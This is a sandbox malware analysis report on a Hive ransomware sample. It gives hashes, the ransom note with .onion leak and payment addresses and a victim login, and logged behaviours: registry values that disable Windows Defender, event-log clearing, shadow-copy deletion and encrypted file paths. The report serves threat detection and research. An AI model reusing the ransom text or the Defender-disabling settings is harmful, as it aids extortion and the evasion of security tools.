hive | 25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5

Analysis

max time kernel
398s
max time network
401s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-03-2024 12:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Size

884KB
MD5

da13022097518d123a91a3958be326da
SHA1

24a71ab462594d5a159bbf176588af951aba1381
SHA256

25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5
SHA512

a82aa97a92cd21ee2d4b556448fd3293396eb7c01d3626ebdb6c3816277783578686830c430014b6b2fc3280bc1301df27da079937f88834c2d35641eb5fc26f
SSDEEP

12288:Sw41dVZvThPCsM18GLHe7wlDdkPAQEtxr0fflvRmhEBWtdUJiAUtP/T/kAfMvgVt:dod1HDmlDdkZ4YXPpaTTXMw

Score

10^/10

hive evasion ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\Program Files\EGdu_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note

Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data or to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: jxkdVr8zZs5J Password: GHTM6Qgqyhqs4nMH53ZD To get access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not shutdown or reboot your computers, unmount external storages. - Do not try to decrypt data using third party software. It may cause irreversible damage. - Do not fool yourself. Encryption has perfect secrecy and it's impossible to decrypt without knowing the key. - Do not modify, rename or delete *.key.uj1ps files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to authorities. The negotiation process will be terminated immediately and the key will be erased. - Do not reject to purchase. Your sensitive data will be publicly disclosed.

URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

Hive
A ransomware written in Golang first seen in June 2021.
ransomware hive

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Clears Windows event logs 1 TTPs 3 IoCs
evasion ransomware

Indicator Removal
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exe

pid process

4296 wevtutil.exe
4364 wevtutil.exe
4652 wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Downloads MZ/PE file

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

pid	process
4296	wevtutil.exe
4364	wevtutil.exe
4652	wevtutil.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

tor-browser-windows-x86_64-portable-13.0.10.exefirefox.exefirefox.exefirefox.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	tor-browser-windows-x86_64-portable-13.0.10.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	firefox.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	firefox.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	firefox.exe

Executes dropped EXE 16 IoCs

Processes:

tor-browser-windows-x86_64-portable-13.0.10.exefirefox.exefirefox.exefirefox.exefirefox.exetor.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exe

pid	process
4960	tor-browser-windows-x86_64-portable-13.0.10.exe
2128	firefox.exe
2544	firefox.exe
812	firefox.exe
2964	firefox.exe
1664	tor.exe
1376	firefox.exe
4332	firefox.exe
4184	firefox.exe
5464	firefox.exe
5612	firefox.exe
5680	firefox.exe
1184	firefox.exe
1828	firefox.exe
5348	firefox.exe
5720	firefox.exe

Loads dropped DLL 64 IoCs

Processes:

tor-browser-windows-x86_64-portable-13.0.10.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exe

pid	process
4960	tor-browser-windows-x86_64-portable-13.0.10.exe
4960	tor-browser-windows-x86_64-portable-13.0.10.exe
4960	tor-browser-windows-x86_64-portable-13.0.10.exe
2128	firefox.exe
2544	firefox.exe
2544	firefox.exe
2544	firefox.exe
2544	firefox.exe
2544	firefox.exe
2544	firefox.exe
2544	firefox.exe
2544	firefox.exe
2544	firefox.exe
2544	firefox.exe
2544	firefox.exe
812	firefox.exe
812	firefox.exe
812	firefox.exe
812	firefox.exe
2964	firefox.exe
2964	firefox.exe
2964	firefox.exe
2964	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
4332	firefox.exe
2964	firefox.exe
4332	firefox.exe
2964	firefox.exe
4332	firefox.exe
4332	firefox.exe
1376	firefox.exe
1376	firefox.exe
4332	firefox.exe
4332	firefox.exe
4184	firefox.exe
4184	firefox.exe
4184	firefox.exe
4184	firefox.exe
4184	firefox.exe
4184	firefox.exe
5464	firefox.exe
5464	firefox.exe
5464	firefox.exe
5464	firefox.exe
5612	firefox.exe
5612	firefox.exe
5612	firefox.exe
5612	firefox.exe
5680	firefox.exe
5464	firefox.exe
5464	firefox.exe
5680	firefox.exe
5680	firefox.exe
5680	firefox.exe
5612	firefox.exe
5612	firefox.exe
5680	firefox.exe
5680	firefox.exe
1184	firefox.exe
1184	firefox.exe
1184	firefox.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/2784-0-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-1-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-37-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-67-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-2917-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-4970-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-6098-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-7877-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-7881-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-7886-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-7893-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-7898-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-7904-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-7910-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-7916-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-7921-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx
behavioral2/memory/2784-7968-0x0000000000DD0000-0x00000000010E2000-memory.dmp	upx

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

firefox.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA firefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	firefox.exe

Drops file in Program Files directory 64 IoCs

Processes:

windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN107.XML.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmyxtFRlPXlOKL4nKE_HexVy.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-16_contrast-white.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond-TrebuchetMs.xml.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmz4UkzYiiYRTwyZpZtzX7g-.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Grace-ul-oob.xrm-ms.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmwtpYKRxKicHVH8qwGQ3rwB.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OrientationControlFrontIndicator.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmy8Z8hqHIVxcxDnblHc1wop.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_PrepidBypass-ul-oob.xrm-ms.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmwUl-mX4bagHMMos99ZKLFf.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-96_altform-unplated.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Xbox.Foundation.Media.winmd	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-64_altform-unplated_contrast-black.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmyPOihfM_i5YLQRtHp9ZKt6.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ja_135x40.svg.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmywxrcg_EfAPqIDRao_exoZ.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\EGdu_HOW_TO_DECRYPT.txt	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmxT5TOXXxkIMdbuWV-XMnIc.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockSmallTile.contrast-black_scale-125.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSmallTile.scale-200.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-150.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\LinkedInboxBadge.scale-400.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\action_poster.jpg.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmxIAV0SCXFMT6lHMVKKik5n.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-256_altform-unplated.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\de-DE\MSFT_PackageManagementSource.strings.psd1.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmyBQ2As0avWPCdLzduRvLxD.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_retina.png.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmzmuXSllI5ffR8dazNtPfI6.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\Icons_Icon_Wind_sm.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\Json\Person-Content.json	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailSmallTile.scale-400.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.Format.ps1xml	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File created	C:\Program Files (x86)\Common Files\Services\EGdu_HOW_TO_DECRYPT.txt	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\jpeg.md.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmxhsQDNOZhpN53DVtAGxqtt.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageSmallTile.scale-200_contrast-black.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.targetsize-20_altform-unplated.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorSmallTile.contrast-white_scale-125.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreMedTile.scale-200.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-20.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial5-ppd.xrm-ms.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmwHzbYEKorKbARi0CmgzTt4.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTest-ul-oob.xrm-ms.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmywanwddYSRPyoe-UiRXPQi.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\resources.pri	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_x64__8wekyb3d8bbwe\Store.Purchase\Controls\WebBlendsControl.xaml	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\1851_40x40x32.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNewNoteSmallTile.scale-150.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\AppStore_icon.svg.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmwjkJ4FfsYVD_UJbz1Dp05y.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Windows Media Player\Media Renderer\DMR_120.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-24_altform-unplated.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\caution.svg.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmz9cFW9RcMQN2IzKK2LNytw.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-40_altform-unplated_contrast-white.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\ui-strings.js.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmzSzVzfKUa0A36fIlNdoTVy.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-80.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\LargeTile.scale-200.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeLargeTile.scale-125.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarMediumTile.scale-400.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwcapitalized.dotx.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmyesk0KuKZUaYXJijN4AsMH.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\CommunityInterop.winmd	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\StoreLogo.scale-125_contrast-black.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\check-mark-2x.png.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmyZO9y-s2EQaUNPk6DZfQlm.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\ui-strings.js.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmwsrzUvWpw_Zs91mg2dU6Ne.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ul-oob.xrm-ms.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmzIJ5d51XpfLUGv0YtFRWRh.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription3-ul-oob.xrm-ms.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmzQ8oJxyX1pWeNYav1oyDFw.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-36.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.targetsize-60_altform-unplated_contrast-black.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
